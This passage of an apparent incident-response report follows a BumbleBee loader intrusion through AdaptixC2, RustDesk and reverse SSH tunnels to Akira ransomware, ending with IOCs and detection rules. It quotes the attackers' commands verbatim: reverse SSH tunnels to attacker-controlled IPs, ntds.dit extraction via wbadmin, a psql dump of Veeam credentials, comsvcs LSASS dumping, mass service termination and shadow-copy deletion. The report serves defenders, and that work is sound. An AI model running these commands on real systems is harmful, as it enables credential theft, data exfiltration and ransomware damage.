culminated in the reactivation of the built-in Domain Administrator account on the primary domain controller. Swisscom In the Swisscom observed intrusion, the threat actor achieved persistence on a domain controller by installing the Cloudflare tunneling software as a Windows service, causing it to run automatically after the host rebooted. Cloudflared has multiple capabilities that are useful for threat actors: Bypasses firewalls and NAT by initiating outbound connections. Encrypts traffic using HTTPS, making inspection more difficult. Avoids the need for port forwarding by using reverse tunneling. Routes the traffic through Cloudflare, which appears legitimate and can evade detection. Requires minimal configuration and is easy to deploy. The installation was performed through a PowerShell script called 1.ps1, which downloaded the software and registered a new service for it. Based on the comments in the script and the strings output in the PowerShell console, it is likely that 1.ps1 was developed with generative AI tools. Privilege Escalation There were a limited number of privilege escalation techniques observed during this incident due to the threat actor obtaining a privileged session by compromising a domain admin in the first instance. Defense Evasion DLL Sideloading The BumbleBee loader established its initial foothold via DLL search order hijacking. The threat actor staged a malicious msimg32.dll file in a user-writable directory alongside a relocated copy of consent.exe (the legitimate Windows UAC binary). Upon execution of consent.exe, the operating system prioritized the local, malicious DLL over the authentic version in System32, triggering the loader’s execution. This hijacked execution flow was corroborated by Sysmon event logs, which captured the anomalous process creation and image loading. Static analysis using PEStudio confirmed that msimg32.dll is a legitimate, expected dependency of the consent.exe binary. The threat actor exploited this imported dependency to facilitate DLL side-loading. Process Injection The deployment of the Adaptix C2 agent was orchestrated through a multi-stage execution chain. The BumbleBee-controlled consent.exe process first dropped AdgNsy.exe to the local disk. The threat actor initiated execution via Windows Management Instrumentation (WMI). By using WMI to launch the binary, the threat actor ensured that AdgNsy.exe spawned under WmiPrvSE.exe. Immediately following execution, Sysmon Event ID 10 (ProcessAccess) recorded the BumbleBee-controlled consent.exe gaining a handle on the AdgNsy.exe process. The associated call trace provided critical evidence of process injection by revealing the specific memory addresses and API calls, such as ntdll.dll and kernelbase.dll leveraged by the loader to reflectively inject the Adaptix shellcode into the trusted process. C:\Windows\SYSTEM32\ntdll.dll+9f3b4|C:\Windows\System32\KERNELBASE.dll+2aafe|C:\Windows\System32\hasherezade_pussy.dll+1ae8f|C:\Windows\System32\hasherezade_pussy.dll+1aee8|C:\Windows\System32\hasherezade_pussy.dll+baca|C:\Windows\System32\hasherezade_pussy.dll+1214d|C:\Windows\System32\hasherezade_pussy.dll+12292d|C:\Windows\System32\KERNEL32.DLL+14ed0|C:\Windows\SYSTEM32\ntdll.dll+7e39b Memory analysis of the AdgNsy.exe process confirmed the presence of unbacked execution. Analysts identified a thread whose entry point originated outside of the known binary’s image space, an indicator of shellcode execution. Furthermore, the discovery of multiple private, non-image regions with Read/Write/Execute (RWX) protections provides conclusive evidence of injected code residing in memory. Scanning the memory of the hijacked AdgNsy.exe process revealed active C2 configuration strings and beaconing artifacts. Because these artifacts were not found during a static analysis of the AdgNsy.exe file, it is clear that the malicious code was injected post-execution. To further support these findings, consent.exe was executed alongside the malicious BumbleBee msimg32.dll via DLL sideloading in a controlled analysis environment, consistent with the observed execution behavior. During runtime, the memory analysis tool PE-sieve, developed by the malware analyst hasherezade, was executed against the live consent.exe process. This resulted in the identification and extraction of an anomalous, unmapped in-memory module dumped as hasherezade_pussy.dll. This module corresponds to the same DLL referenced in the previously observed Sysmon call trace. Subsequent analysis of hasherezade_pussy.dll indicated that it contained functionality related to environment and virtualization checks, encrypted payload handling, and process injection. Strings within the module reference multiple Win32 and NTAPI functions commonly used for process injection, supporting the hypothesis that shellcode was injected into AdgNsy.exe. File Deletion Forensic analysis of host telemetry revealed a pattern of secure file deletions intended to minimize the attack’s local footprint. By monitoring Sysmon Event ID 23, we identified the precise timestamps and file paths of the components removed by the threat actor, including the initial loaders and reconnaissance logs. Case variation in command execution The threat actor utilized command-line obfuscation by employing inconsistent, mixed-case strings for process execution. Invocations such as CmD.eXe and pOWerShELl.exE were likely used to evade case-sensitive detection signatures or rudimentary pattern-matching rules within security monitoring tools. Swisscom In the Swisscom incident, the threat actor attempted to neutralize endpoint security controls by employing a Bring Your Own Vulnerable Driver (BYOVD) attack. They deployed three potentially malicious or known-vulnerable drivers to the %TEMP% directory and registered them as new system services to gain kernel-level privileges: Service: mgdsrv | Path: ...\AppData\Local\Temp\rwdrv.sys Service: KMHLPSVC | Path: ...\AppData\Local\Temp\hlpdrv.sys Forensic evidence from the RecentApps registry artifact suggested these drivers were managed by high-confidence “AV-killer” utilities. Although the executables were deleted prior to acquisition, the GUI execution history tracked the following paths: C:\ProgramData\av_kill_new\icardagt\icardagt.exe C:\ProgramData\av_kill_old\mfpmp\mfpmp.exe Credential Access NTDS.dit On the second day, the threat actor utilized the high-privilege backup_EA account to access a domain controller via RDP. The objective was to perform offline credential harvesting by extracting the Active Directory database (ntds.dit). Using the native Windows utility wbadmin.exe, the threat actor created a volume shadow copy backup containing the ntds.dit file and the SYSTEM and SECURITY registry hives. These files were staged in C:\ProgramData, providing the threat actor with all the necessary components to crack domain-wide password hashes offline. wbadmin.exe start backup -backuptarget:\\127.0.0.1\C$\ProgramData\ -include:C:\windows\NTDS\ntds.dit,C:\windows\system32\config\SYSTEM,C:\windows\system32\config\SECURITY -quiet Following the backup, they were observed using Notepad to review the backup logs, likely verifying the integrity of the stolen data before exfiltration. Following this activity, the threat actor rotated between nine different accounts while conducting their operation. Veeam Credential Dump Despite already having domain admin privileges, the threat actor extracted the credentials stored in the Veeam PostgreSQL database present in the backup server. The query was executed four different times from two accounts: Interactive Access: Three queries were performed via RDP sessions, suggesting manual verification of the credentials. Automated Extraction: A final query was executed remotely via WMI, utilizing an encoded PowerShell script to invoke the psql.exe utility. C:\Program Files\PostgreSQL\15\bin\psql.exe -U postgres --csv -d VeeamBackup -w -c "SELECT user_name,password,description,change_time_utc FROM credentials" The WMI-based execution was spawned via WmiPrvSE.exe and used an encoded PowerShell command. ParentImage: WmiPrvSE.exe Image: C:\Windows\System32\cmd.exe CommandLine: cmd.exe /Q /c powershell.exe -e JABQAG8AcwB0AGcAcgB1AFMAcQBsAEUAeABlAB1AGMAIAAa9ACAA... The decoded script extracted the credentials and decrypted them using DPAPI, by handling both legacy Veeam password storage and newer versions using a hard-coded salt value. Remote LSASS Memory Dump On day three, the threat actor targeted three hosts for LSASS memory dumping using the comsvcs.dll MiniDump technique. The threat actor used an automated toolset to cycle through four distinct remote execution methods per host in rapid succession (approximately 50 seconds total): SMB: Service creation via svcctl . WMI: Remote process invocation. Scheduled Tasks: Remote task registration and triggering. DCOM: Lateral movement via the MMC20.Application object. Image: C:\Windows\System32\rundll32.exe CommandLine: rundll32.exe C:\windows\System32\comsvcs.dll, #+000024 \Windows\Temp\ . full The memory dumps were staged in \Windows\Temp using randomized filenames and deceptive extensions. The specific filenames observed across the targeted hosts were G7wO.sys, U8Vfsh.docx, and AsaZQZDJz.avhdx. This behavior is a high-confidence match for the lsassy credential dumping utility. The tool’s IDumpMethod base class defaults to the exact sequential execution order observed in this incident: smb, wmi, task, then mmc. Furthermore, the observed extensions correspond directly to lsassy‘s hardcoded randomization list, and the use of \Windows\Temp aligns with the tool’s default staging directory. Under the hood, lsassy leverages the Impacket library for remote orchestration. The four observed execution methods correspond directly to specific Impacket modules: smbexec.py : Facilitates SMB service creation. wmiexec.py : Manages WMI remoting. atexec.py : Handles remote scheduled task registration. mmcexec.py : Executes via DCOM. Detailed forensic artifacts and detection strategies for these specific techniques are documented in SnapAttack’s technical analysis. Discovery Approximately five hours after initial access, the AdaptixC2 process (AdgNsy.exe) was executed on the beachhead host after which the threat actor performed hands‑on‑keyboard discovery. /c systeminfo /c nltest /dclist: /c whoami /groups /c nltest /domain_trusts /c nltest /dclist:REDACTED.lan /c ping -n 1 REDACTED.lan /c ping -n 1 REDACTED.lan (...) /c ping -n 1 REDACTED.lan /c ping -n 1 REDACTED.lan Shortly afterwards, a network scan was initiated from the AdgNsy.exe process, targeting common ports such as SMB, RDP and LDAP. The threat actor then executed more system and network discovery commands on the beachhead. /c quser /server:REDACTED.lan /c quser /server:REDACTED.lan /c dir C:\\programdata /c dir C:\\\\programdata /c nltest /dclist: /c nltest /domain_trusts /c nltest /dclist:REDACTED.lan /c net group domain admins /dom /c net group "domain admins" /dom /c whoami /groups /c ping -n 1 REDACTED.lan On day two of the intrusion, the threat actor established an RDP session to a domain controller using a newly created user and performed further discovery. systeminfo C:\Windows\system32\NOTEPAD.EXE C:\Windows\Logs\WindowsServerBackup\Backup-REDACTED.log net user adminiatrstor net user administrator net group domain admins /dom Approximately 30 minutes later, the threat actor initiated RDP sessions to two additional servers and queried the local administrator account on each using the command net user administrator On day three of the intrusion, the threat actor again logged into the domain controller, executed discovery commands, and then dropped a SoftPerfect Network Scanner binary (n.exe), which was executed to perform a network scan. ping -n 1 REDACTED.lan ping -n 1 REDACTED.lan quser The execution of SoftPerfect Netscan can be confirmed by both the SMB traffic as well as the creation of the file delete.me, which the tool does when testing a folder’s write-ability. After running the network scanner, the threat actor connected to a file server via RDP and ran a couple of discovery commands. systeminfo net user administrator Shortly after, they connected to a backup server using RDP and executed more discovery commands: net user administrator net group net user C:\Windows\system32\taskmgr.exe /4 quser net localgroup net localusers net localuser net localgroup administrators net accounts Returning to the domain controller, the threat actor enabled the domain administrator account and enumerated group memberships. net user administrator /active:yes /dom net group net group REDACTED /dom Approximately 40 minutes later, a PowerShell script was executed on the domain controller to enumerate Service Principal Names (SPNs) for specific services, resolve their hostnames to IP addresses, and write the result to spn.txt. The output was reviewed manually using Notepad. Shortly after, Invoke-Sharefinder was executed to enumerate accessible SMB shares. Invoke-ShareFinder is a reconnaissance utility designed to enumerate accessible network file shares (SMB) across a domain. It was originally developed as part of the PowerView module within the PowerSploit framework, but has since been integrated into numerous offensive projects. Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\programdata\shares.txt On day five, two days later, the same command was re-executed on the domain controller, with the results manually inspected via Notepad. Subsequently, the threat actor leveraged an RDP session from a RustDesk host to pivot to a child domain controller. Upon gaining access, the threat actor initiated a fresh phase of discovery, primarily utilizing native system utilities to map the new environment. "C:\Windows\system32\taskmgr.exe" /4 systeminfo Following that, the threat actor leveraged PowerShell to enumerate domain computers and user objects, query and export DNS zone data from a domain controller, identify accessible SMB shares, and run the same SPN enumeration script observed earlier in the intrusion. Get-ADComputer -Server 10.REDACTED -Filter * -Property * | Select-Object Enabled, Name, DNSHostName, IPv4Address, OperatingSystem, Description, CanonicalName, servicePrincipalName, LastLogonDate, whenChanged, whenCreated | export-csv -path C:\ProgramData\AdComputers.csv Get-ADUser -Server 10.REDACTED -Filter * -Properties * | Select-Object Enabled, CanonicalName, CN, Name, SamAccountName, MemberOf, Company, Title, Description, Created, Modified, PasswordLastSet, LastLogonDate, logonCount, Department, telephoneNumber, MobilePhone, OfficePhone, EmailAddress, mail, HomeDirectory, homeMDB | export-csv -path C:\ProgramData\AdUsers.csv Get-DnsServerZone -ComputerName REDACTED.lan Export-DnsServerZone -Name "REDACTED.lan" -FileName "REDACTED.txt" Export-DnsServerZone -Name "REDACTED.lan" -FileName "REDACTED.lan.txt" Export-DnsServerZone -Name "TrustAnchors" -FileName "TrustAnchors.txt" Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\programdata\shares.txt The outputs from these discovery activities were manually reviewed. The threat actor then dropped and executed a SoftPerfect Network Scanner binary (n.exe) on the child domain controller to perform a network scan. Finally, additional net commands and pings were issued to validate connectivity and enumerate backup and file servers. Lateral Movement The primary vector for lateral movement was native Windows RDP, used both through standard application access and SSH RDP tunneling. By leveraging the elevated backup_EA account, the threat actor successfully accessed nearly every available RDP instance in the environment. While they eventually rotated through several compromised domain accounts to maintain mobility, the pivotal initial pivot was established from the beachhead host to the Domain Controller using the backup_EA credentials. Forensic evidence showed the creation of a reverse SSH tunnel, a tactic used to expose internal RDP sessions to an threat actor-controlled external server: ssh [email protected][.]150 -R *:10400 -p22 ssh [email protected][.]150 : Established a session with the threat actor’s remote C2 server. -R *:10400 : Configured a reverse port forward. This binded port10400 on the remote server to an internal resource. The wildcard (* ) ensured the tunnel listened on all remote interfaces, facilitating external access. -p22 : Specified the standard SSH port for the connection. Subsequent logs confirmed a successful connection bridge to the local RDP port (3389) via ssh.exe, effectively bypassing firewall restrictions to provide the threat actor with direct GUI access to the internal network. While performing authentication through this tunnel, we observed the following workstation names from the threat actor: WORK kali Swisscom Leveraging a compromised Domain Admin account, the threat actor performed lateral movement to the domain controller and various servers using multiple protocols, primarily RDP. The RDP sessions were established via a Cloudflare tunnel, which effectively obfuscated the threat actor’s origin. This was confirmed by Windows Event Logs (EVTX), which recorded connections originating from the local loopback address (::%16777216) or known threat actor-controlled servers. This specific IP artifact is a sign of RDP tunneling, as the connection is proxied through a local process rather than a remote network address. The following workstation names were identified as associated with the threat actor’s activity: DESKTOP-HPLM2TD DESKTOP-KLKBBTS SERVER kali Collection Multiple collection artifacts were observed throughout the incident. The threat actor used a combination of legitimate Windows utilities, well-known PowerShell modules such as Invoke-ShareFinder, and prebuilt collection scripts to compile and collect data on the environment. Automated Collection Scanning Automated scanning was observed that appeared to target typical credential and config data stores. This activity directly preceded installation and execution of FileZilla, so it is possible this data was the primary focus for exfiltration. Network share access logs (Event ID 5145) captured the threat actor systematically checking for credential and data storage in the following locations. Note that Event ID 5145 logs access attempts whether or not the target path exists, so this represents the threat actor’s enumeration efforts rather than confirmation that all directories were present: Credential Theft: Users\\Administrator\\AppData\\Roaming\\Microsoft\\Protect\\ (DPAPI master keys) Users\\Administrator\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\ (RSA private keys) Users\\Administrator\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\ (User certificates) Users\\Administrator\\AppData\\Local\\Microsoft\\Credentials\\ (Windows Credential Manager) Users\\Administrator\\AppData\\Roaming\\Microsoft\\Credentials\\ (Windows Credential Manager) Browser Data (Passwords, Cookies, Autofill): Users\\Administrator\\AppData\\Local\\Google\\Chrome\\User Data\\ Users\\Administrator\\AppData\\Local\\Microsoft\\Edge\\User Data\\ Users\\Administrator\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\ Users\\Administrator\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\ Cloud Platform Credentials: Users\\Administrator\\.aws\\ (AWS credentials) Users\\Administrator\\AppData\\Roaming\\gcloud\\ (Google Cloud credentials) Users\\Administrator\\AppData\\Roaming\\Windows Azure Powershell\\ (Azure credentials) Users\\Administrator\\.azure\\ (Azure CLI credentials) Password Manager Applications: Users\\Administrator\\AppData\\Local\\1Password\\ Users\\Administrator\\AppData\\Local\\LastPass\\ Users\\Administrator\\AppData\\Local\\KeePass\\ Users\\Administrator\\AppData\\Roaming\\Dashlane\\ Users\\Administrator\\AppData\\Local\\Bitwarden\\ Users\\Administrator\\AppData\\Local\\RoboForm\\ Users\\Administrator\\AppData\\Local\\StickyPassword\\ Users\\Administrator\\AppData\\Local\\NordPass\\ Users\\Administrator\\AppData\\Local\\Enpass\\ Development/Source Code Directories: Users\\Administrator\\source\\repos\\ Users\\Administrator\\workspace\\ Users\\Administrator\\IdeaProjects\\ Users\\Administrator\\PycharmProjects\\ Users\\Administrator\\AndroidStudioProjects\\ Users\\Administrator\\Documents\\NetBeansProjects\\ Users\\Administrator\\Documents\\Xcode\\ Users\\Administrator\\CLionProjects\\ Users\\Administrator\\RubyMineProjects\\ Users\\Administrator\\Documents\\Qt\\ Users\\Administrator\\Documents\\CodeBlocks\\ Users\\Administrator\\RiderProjects\\ Users\\Administrator\\PhpStormProjects\\ Remote Access Tool: Users\\Administrator\\AppData\\Local\\mRemoteNG\\ (settings and connection configs) Users\\Administrator\\AppData\\Roaming\\mRemoteNG\\ (settings and connection configs) Other: Users\\Administrator\\AppData\\Roaming\\Notepad++\\backup\\ These were all identified by reviewing 5145 events on the file server. Command and Control The threat actor used BumbleBee, AdaptixC2 and RustDesk, in addition to a reverse SSH tunnel to establish connections to their C2 infrastructure. BumbleBee Immediately upon execution, the BumbleBee process attempted to connect to multiple DGA-generated domains. While several failed to resolve, successful connections were established with 188.40.187[.]145:443 and 109.205.195[.]211:443 using the domains ev2sirbd269o5j[.]org and 2rxyt9urhq0bgj[.]org respectively. The BumbleBee configuration was extracted from Tria.ge and verified through analysis of the running process and host artifacts. Throughout the intrusion, the malware persistently attempted connections to DGA domains identified in the configuration, eventually establishing communication with additional IP addresses, including 171.22.183[.]43. Approximately five hours post-initial execution, BumbleBee dropped AdgNsy.exe, which used code injection to initialize AdaptixC2 on the beachhead host. A concurrent spike in network traffic between the BumbleBee process and 109.205.195[.]211 indicates that this IP facilitated the payload download. AdaptixC2 AdaptixC2 is a relatively new open-source post-exploitation and adversarial emulation framework. Although originally designed for legitimate penetration testing, it is increasingly being leveraged by threat actors in malicious campaigns. Further technical details on the framework are available in this Unit42 analysis. The AdaptixC2 beacon, delivered via AdgNsy.exe on the beachhead host, maintained persistent command-and-control (C2) communication with 172.96.137[.]160 throughout the intrusion. Notably, there was a cessation of activity between days three and five, during which no beaconing was observed. The following graph illustrates the AdaptixC2 traffic patterns over the course of the intrusion. The IP address 172.96.137[.]160 was hosted by Shock Hosting. We were able to extract the configuration of the AdaptixC2 beacon, which validated the host artifacts discovered on the beachhead host. RustDesk On the second day, RustDesk was installed on two Windows servers and executed in system tray mode. "C:\Program Files\RustDesk\RustDesk.exe" --tray On day three, the threat actor re-entered the environment via RustDesk on a primary server. Although the RustDesk process was already resident in the system tray, a Windows Security Event 4624 was recorded, showing an interactive logon (Type 2) from the localhost address (127.0.0.1). This event was immediately followed by the execution of the RustDesk connection manager, confirming that the threat actor had established a remote desktop session to the endpoint. "C:\Program Files\RustDesk\RustDesk.exe" --cm Additionally, RustDesk logs on the host show clipboard and screen-sharing activity consistent with an interactive remote desktop session, lasting for several hours. Reverse SSH tunnel On day three, the threat actor performed lateral movement from the initial server to a domain controller via RDP. Once on the DC, the threat actor leveraged the built-in Windows SSH client to establish a reverse tunnel to a remote host, effectively proxying subsequent malicious activity through this encrypted channel. This same reverse SSH tunneling technique was later identified on a separate Windows server on day five. However, SSH traffic was only observed between the domain controller and the external IP on day three. We also tracked login activity to the domain controller from a Kali Linux host shortly following the creation of the reverse SSH tunnel. Swisscom observed the same technique; however, in this case, the threat actor accessed a different IP address: ssh -p22 [email protected][.]60 -R 5554 Exfiltration The first notable transfer occurred after the establishment of the first reverse SSH tunnel on a domain controller. Network flow analysis revealed approximately 2.5GB of data transferred from the domain controller to the threat actor controlled server at 193[.]242[.]184[.]150 over port 22. The transfer occurred over a concentrated time period shortly after the tunnel was established, consistent with bulk data exfiltration. Analysis of Windows Event ID 5145 logs on Domain Controller A revealed the threat actor accessed the domain’s SYSVOL share at the same time that we see the ~2.5GB transfer initiate, indicating that SYSVOL data was likely exfiltrated. SYSVOL contains Group Policy Objects, login scripts, and domain-wide configurations. By accessing SYSVOL, the threat actor would have gained visibility into the organization’s security posture and Active Directory infrastructure. FileZilla was the primary method of exfiltration during this intrusion with the initial transfer taking place on the third day, roughly 39 hours after initial access. After executing C:\\ProgramData\\FileZilla_3.68.1_win64_sponsored2-setup.exe, the threat actor proceeded to connect to 185[.]174[.]100[.]203:22 to exfiltrate data. No file compression or specific harvesting tactics were observed, so it is likely the threat actor was just indiscriminately exfiltrating files from network shares; perhaps based on the names of the files/folders. The only collection methods observed showed a big interest in user data and credential gathering, likely to either sell the data or to be used by the threat actor for additional follow-on attacks. While the source of the FileZilla installer could not be identified, we were able to surface file creation logs that show explorer.exe as the responsible process. Considering that RDP was used throughout this intrusion, and there were rdpclip executions just before FileZilla execution on the File Sever, it is likely this executable was transferred via RDP clipboard from the threat actor’s machine to the File Server. "_timestamp": REDACTED, "Image": C:\Windows\Explorer.EXE, "TargetFilename": C:\ProgramData\FileZilla_3.68.1_win64_sponsored2-setup.exe, "ProcessGuid": {7992d2de-71d7-6873-9387-010000000e00}, "message": File created: RuleName: - UtcTime: REDACTED ProcessGuid: {7992d2de-71d7-6873-9387-010000000e00} ProcessId: 10560 Image: C:\Windows\Explorer.EXE TargetFilename: C:\ProgramData\FileZilla_3.68.1_win64_sponsored2-setup.exe CreationUtcTime: REDACTED User: \Administrator Note that the naming of this FileZilla executable is not unusual and this is the expected naming convention used for their free version installers. Analysis of Zeek logs show that roughly 77GB of data was transferred out of the victim network via two unique sessions originating from FileZilla. As stated earlier in the collection section, at least a portion of this was user credential data. Review of FileZilla’s recentservers.xml log file shows the username Stark was used. Logon type 2 indicates the password is prompted and manually entered each time and is not saved locally. Protocol 1 confirms SFTP protocol was used. SSH Exfiltration Sessions to 185.174.100.203:22 Session 1: CTXU3p4hyiBMiOHgta (Data Transfer #1) Source: :60368 Destination: 185.174.100.203:22 (Ukraine, AS-COLOCROSSING) Timestamp: REDACTED Duration: 16,362 seconds (~4.5 hours) Data Transferred: 39,282,787,186 bytes (39.28 GB) Connection Details: Protocol: SSH over TCP State: RSTO (Connection established, originator aborted with RST) SSH Client: SSH-2.0-FileZilla_3.68.1 SSH Server: SSH-2.0-OpenSSH_for_Windows_9.8 Win32-OpenSSH-GitHub Session 2: C5YTxCs9PfDHuCQLd (Data Transfer #2) Source: :60367 Destination: 185.174.100.203:22 (Ukraine, AS-COLOCROSSING) Timestamp: REDACTED Duration: 16,733 seconds (~4.6 hours) Data Transferred: 41,177,980,833 bytes (41.77 GB) Connection Details: Protocol: SSH over TCP State: RSTO (Connection established, originator aborted with RST) SSH Client: SSH-2.0-FileZilla_3.68.1 SSH Server: SSH-2.0-OpenSSH_for_Windows_9.8 Win32-OpenSSH-GitHub Impact Data Encryption Approximately 44 hours after the initial compromise, the threat actor initiated the Akira ransomware deployment, beginning with the backup server. The binary, staged as C:\ProgramData\locker.exe, was executed using the following parameters: locker.exe -p=G:\ -n=15 . In this context, the -p flag defines the target encryption path, while -n determines the percentage of each file to be encrypted—a tactic often used to speed up the encryption process. On the file server, the threat actor uninstalled FileZilla, likely to remove evidence of exfiltration, before executing the ransomware locally. From the domain controller, the threat actor utilized remote execution flags to target and encrypt network shares, followed by several additional passes across various directories to maximize the impact of the deployment. The threat actor monitored encryption progress by reviewing log files generated by the ransomware. On day five, the threat actor re-entered the environment via RustDesk, pivoting to the child domain controller via RDP. Once positioned, the threat actor executed the ransomware binary 39 times on that specific domain controller. Shadow Copy Deletion The Akira ransomware binary automated the deletion of Volume Shadow Copies upon execution, leveraging WMI to trigger a PowerShell command. On every impacted host, each locker.exe instance was followed by a shadow copy deletion within approximately one second: powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" Swisscom Nine hours after gaining initial access, the threat actor initiated the ransomware deployment, beginning with the domain controller and subsequently propagating to additional servers. Prior to the encryption phase, the threat actor performed a coordinated service termination to ensure that database files and web services were unlocked and accessible for encryption. Using WMIC, they targeted every host listed in hosts1.txt to disable and terminate services associated with SQL and IIS: Service Disabling wmic /node:@C:\temp\hosts1.txt /failfast:on service where "Name Like '%sql%'" call ChangeStartmode Disabledwmic /node:@C:\temp\hosts1.txt /failfast:on service where "Name Like '%iis%'" call ChangeStartmode Disabled Process Termination wmic /node:@C:\temp1\hosts.txt /failfast:on process where "CommandLine Like '%sql%'" delete The ransomware payload, renamed as win.exe, was staged in the C:\ProgramData directory and executed with the following parameters: .\win.exe -n=2 netonly . The use of the -n=2 flag indicates a specific encryption threshold, while the netonly argument was likely used to focus the impact on network-accessible resources and shares. Timeline Diamond Model Indicators Atomic opmanager[.]pro download-center[.]online ev2sirbd269o5j[.]org - BumbleBee 2rxyt8yrhq0bgj[.]org - BumbleBee d1hmxkpwby0d4s[.]org - BumbleBee yj6jurm5qqkye5[.]org - BumbleBee ewujsfb1dp5ran[.]org - BumbleBee 8doj8uvx604eck[.]org - BumbleBee kwywztxoo2xdot[.]org - BumbleBee ky1d1p1daahe5t[.]org - BumbleBee ovh1kn1tcqw5kp[.]org - BumbleBee 6cimu4mc085em8[.]org - BumbleBee 5ka8rxp6t6eup2[.]org - BumbleBee ks501oz9nm3v05[.]org - BumbleBee v5rjsdqogstopr[.]org - BumbleBee 192.121.22.94 - BumbleBee 109.205.195.211 - BumbleBee 188.40.187.145 - BumbleBee 171.22.183.43 - BumbleBee 194.127.178.21 - BumbleBee 172.96.137.160 - AdaptixC2 193.242.184.150 - Reverse SSH Tunnel 185.174.100.203 - Exfil Server Computed ManageEngine-OpManager.msi 124a48b78060fa851e1cc077ca35713c ab82bf27132323861810c0efcac6d5dd01600dd4 186b26df63df3b7334043b47659cba4185c948629d857d47452cc1936f0aa5da msimg32.dll ca8646dfc88423bb9fffda811160cebe febbaf5f08a8e0782ffcce8beef1f2b4e249a52b a6df0b49a5ef9ffd6513bfe061fb60f6d2941a440038e2de8a7aeb1914945331 locker.exe 8c113b3aa82c81eee7c6b4ed0ba9a90f d66944e1a57daf04d3e809f22cd01946d593acaf de730d969854c3697fd0e0803826b4222f3a14efe47e4c60ed749fff6edce19d Detections Network 2056726 : ET MALWARE BumbleBee Loader CnC Checkin 2056727 : ET MALWARE BumbleBee Loader CnC Server Response 2027174 : ET INFO Command Shell Activity Over SMB - Possible Lateral Movement 2047702 : ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup 2047703 : ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI 2027267 : ET INFO Possible Lateral Movement - File Creation Request in Remote System32 Directory 2043343 : ET INFO RustDesk Domain in DNS Lookup 2044076 : ET INFO RustDesk Relay Domain in DNS Lookup 2025701 : ET INFO SMB2 NT Create AndX Request For an Executable File 2025703 : ET INFO SMB2 NT Create AndX Request For an Executable File In a Temp Directory 2027182 : ET INFO WMIC WMI Request Over SMB - Likely Lateral Movement 2027189 : ET NETBIOS DCERPC DCOM ExecuteShellCommand Call 2851485 : ETPRO INFO SMB/DCERPC Bind_ack with Big-Endian Assoc Group 2851484 : ETPRO INFO SMB/DCERPC Bind_ack with Endian Flipped Sigma Search rules on detection.fyi or sigmasearchengine.com 410f5c82-1fec-42d0-9552-7d9d885517b2 : Veeam Credential Dumping via PostgreSQL psql 637ab586-af22-4be2-9100-215952232f65 : DNS Zone Enumeration and Export via PowerShell e20f9b0e-b4af-40b7-8a9d-eaed7f61d4cd : LSASS Enumeration Followed by Memory Dump - Correlation Rule 9c4034f6-d413-49e1-b257-419775a14736 : Multiple DGA DNS Queries - Correlation Rule Sigma Repo: 646ea171-dded-4578-8a4d-65e9822892e3 : Process Memory Dump Via Comsvcs.DLL 4ac1f50b-3bd0-4968-902d-868b4647937e : DPAPI Domain Backup Key Extraction 87df9ee1-5416-453a-8a08-e8d4a51e9ce1 : Delete Volume Shadow Copies Via WMI With PowerShell 05a2ab7e-ce11-4b63-86db-ab32e763e11d : MMC Spawning Windows Shell fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c : PowerShell Base64 Encoded FromBase64String Cmdlet ca2092a1-c273-4878-9b4b-0d60115bf5ea : Suspicious Encoded PowerShell Command Line b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c : Suspicious PowerShell Encoded Command Patterns 8a582fe2-0882-4b89-a82a-da6b2dc32937 : Suspicious WmiPrvSE Child Process c7c8aa1c-5aff-408e-828b-998e3620b341 : MSI Installation From Suspicious Locations 2aa0a6b4-a865-495b-ab51-c28249537b75 : Startup Folder File Write 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 : Potentially Suspicious CMD Shell Output Redirect 178e615d-e666-498b-9630-9ed363038101 : Elevated System Shell Spawned From Uncommon Parent Location 61065c72-5d7d-44ef-bf41-6a36684b545f : Elevated System Shell Spawned 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a : CMD Shell Output Redirect a24e5861-c6ca-4fde-a93c-ba9256feddf0 : Uncommon Process Access Rights For Target Image 241e802a-b65e-484f-88cd-c2dc10f9206d : Read Contents From Stdin Via Cmd.EXE d21374ff-f574-44a7-9998-4a8c8bf33d7d : WmiPrvSE Spawned A Process 502b42de-4306-40b4-9596-6f590c81f073 : Local Accounts Discovery e28a5a99-da44-436d-b7a0-2afc20a5f413 : Whoami Utility Execution bd8b828d-0dca-48e1-8a63-8a58ecf2644f : Group Membership Reconnaissance Via Whoami.EXE 0ef56343-059e-4cb6-adc1-4c3c967c5e46 : Suspicious Execution of Systeminfo 903076ff-f442-475a-b667-4f246bcc203b : Nltest.EXE Execution 5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac : Net.EXE Execution d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 : Suspicious Group And Account Reconnaissance Activity Using Net.EXE cd219ff3-fa99-45d4-8380-a7d15116c6dc : New User Created Via Net.EXE 8eef149c-bd26-49f2-9e5a-9b00e3af499b : Pass the Hash Activity 2 4d07b1f4-cb00-4470-b9f8-b0191d48ff52 : DNS Query To Remote Access Software Domain From Non-Browser App fb843269-508c-4b76-8b8d-88679db22ce7 : Suspicious Execution of Powershell with Base64 692f0bec-83ba-4d04-af7e-e884a96059b6 : Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6 : Unusually Long PowerShell CommandLine 42f595c8-7223-43b1-93d3-0349a851a535 : PowerShell Get-Process LSASS in ScriptBlock 5b768e71-86f2-4879-b448-81061cbae951 : Suspicious Manipulation Of Default Accounts Via Net.EXE YARA AdaptixC2_listener_beacon_http AdaptixC2_listener_beacon_http_var2 BumblebeeC2 CAPE_Bumblebee2024 DITEKSHEN_MALWARE_Win_Akira MALPEDIA_Win_Bumblebee_Auto Multi_Ransomware_Akira_21842eb3 SECUINFRA_SUSP_Powershell_Base64_Decode SIGNATURE_BASE_MAL_WIN_Akira_Apr25 SIGNATURE_BASE_SUSP_PS1_JAB_Pattern_Jun22_1 